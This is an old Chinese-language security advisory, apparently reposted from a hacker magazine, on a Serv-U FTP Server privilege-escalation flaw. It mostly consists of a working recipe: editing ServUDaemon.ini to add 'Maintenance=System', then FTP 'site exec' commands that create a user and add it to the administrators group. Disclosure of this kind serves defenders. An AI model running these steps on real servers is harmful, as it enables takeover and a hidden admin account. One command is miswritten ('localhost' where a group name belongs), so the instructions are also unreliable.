Serv-U FTP Server远程/本地提升权限缺陷

来源:天新网 时间:2007-08-13 14:08:00 

本地提升权限:是

远程提升权限:是

使用前提条件:对Serv-U配置文件有修改权限

声明:这只是一个提升权限的思路和方法。

一、受影响的软件

Serv-U FTP Server 4.1.0.9 (以及以前所有版本)

二、受影响系统

Microsoft Windows Server 2003 所有版本

Microsoft Windows XP 所有版本

Microsoft Windows 2000 所有版本

Microsoft Windows NT 所有版本

三、综述

Serv-U FTP Server为RhinoSoft出品的一款Ftp Sserver软件,目前在全世界广为使用。经我研究发现,Serv-U FTP Server的配置文件存贮于Serv-U FTP Server文件目录下的ServUDaemon.ini文件中。如果本地受限用户或者远程拥有普通权限的攻击者能接触到该文件并精心构造ServUDaemon.ini文件中的内容就能利用Ftp进程在系统上以SYSTEM权限执行任意命令。

四、缺陷分析:

Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响。(用户信息选择“存储与系统注册表中”不受此缺陷影响)

五、测试方法:

1、本地测试

假设本地受限用户可以浏览Serv-U FTP Serve的文件目录。找到ServUDaemon.ini文件。用记事本打开原文件大致内容为:


           

[GLOBAL]
Version=4.1.0.0    // Serv-U Ftp Server 版本号
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0    //主机IP以及域名,端口情况
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:\     // 可以浏览的目录
TimeOut=600  
Access1=C:\|RWAMLCDP

如果把ServUDaemon.in文件修改为:

[GLOBAL]
Version=4.1.0.0
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0          
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:\
TimeOut=600
Maintenance=System  //权限类型
Access1=C:\|RWAMELCDP

以上内容比原内容多了一句“Maintenance=System”修改完成后保存。然后在用Ftp登陆到Serv-U FTP Server以后执行如下命令:

ftp>open ip    
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (ip:(none)): id  //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password  //密码
230 User logged in, proceed.
ftp> cd winnt   //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32  //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user zihuan ziHUAN /add   //利用系统的net.exe文件加用户。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators zihuan /add  //提升为超级用户

这样就在本地系统上加了一个为zihuan密码为:ziHUAN的超级用户。也可以直接用quote site exec net.exe localhost administrators user /add命令把当前用户提升到超级用户组中去。当然也可以在系统上执行任何命令。

声明:

本本仅用来描述可能存在的安全问题,作者本人和黑客X档案杂志社不为此安全公告提供任何保证或承诺。由于传播、利用此文章提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。作者拥有对此安全公告的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者本人允许,不得任意修改或者增减此文章公告内容。

标签:
0
投稿

猜你喜欢

  • Tomcat实现session共享(session 会话复制)

    2023-07-08 12:13:33
  • 谈谈站长注册域名的几个技巧

    2007-12-12 21:58:00
  • 从wordpress搬家经历得出的几点经验分享

    2011-04-11 18:20:00
  • VMware虚拟机安装苹果Mac OS的超详细教程

    2023-05-07 11:22:53
  • 中小型企业如何打好综合网络营销持久战

    2009-04-07 10:13:00
  • 老谢:软文入门注意点

    2009-04-07 16:17:00
  • 动易SiteFactory 2.5新功能:自动上传word图片

    2009-05-17 10:31:00
  • 在Windows系统下搭建SVN服务器

    2009-08-30 08:00:00
  • Wolfram Alpha知识引擎向开发者开放API

    2009-10-16 09:42:00
  • Linux C++ 使用condition实现阻塞队列的方法

    2023-11-12 10:09:45
  • Google PR 更新、查询及做弊

    2008-03-02 16:43:00
  • 个人品牌的称呼

    2009-10-26 18:07:00
  • linux服务器系统中手动配置lamp服务器的经验分享

    2023-07-12 16:59:44
  • Pay Per Click 广告模式并不一定适合你

    2009-04-15 14:20:00
  • Windows服务器安全维护的几个需要注意点

    2009-01-06 17:04:00
  • 小说站新手的经验 献给广大想作文学站的朋友

    2009-03-05 13:17:00
  • 了解谷歌搜索引擎工作原理 做好网站优化

    2009-01-13 09:04:00
  • 论策浅谈四种方法搞定网站推广

    2009-05-15 19:24:00
  • 人站长 请坚持住不要放弃

    2008-09-02 11:57:00
  • 解决docker 容器设置中文语言包出现的问题

    2023-08-17 07:18:04
  • asp之家 网站运营 m.aspxhome.com